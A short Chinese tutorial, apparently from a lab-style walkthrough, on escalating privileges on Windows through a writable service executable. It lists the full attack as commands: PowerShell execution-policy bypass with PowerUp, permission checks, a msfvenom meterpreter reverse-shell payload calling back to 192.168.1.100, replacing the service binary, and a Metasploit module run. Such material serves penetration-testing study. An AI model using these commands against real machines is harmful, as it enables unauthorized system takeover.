windows本地提权服务之可执行文件

windows本地提权服务之可执行文件

b站上的视频教程

漏洞原理是windows服务权限配置不当,任何人都可以修改服务的应用程序。将恶意代码复制到服务的应用程序末尾,重新启动该服务,即可利用漏洞。

运行powershell脚本发现漏洞

1
2
3
4
powershell -nop -ep bypass
Import-Module C:\Users\user\Desktop\PowerUp.ps1
Get-ModifiableServiceFile > 1.txt

查看运行结果1.txt

确认漏洞

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"

RW everyone 说明任何人都有读写权限。

sc qc filepermsvc

生成攻击载荷

伪造服务应用程序

1
2
3
handler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe-service -o x.exe

利用漏洞

copy /y c:\Temp\x.exe “c:\Program Files\File Permissions Service\filepermservice.exe”

sc start filepermsvc

net localgroup administrators

通过msf模块

1
2
3
4
5
6
7
search windows/local/service_permissions
use 0
set sessions x 
set lhost 192.168.1.100
set lport 4455
show options
run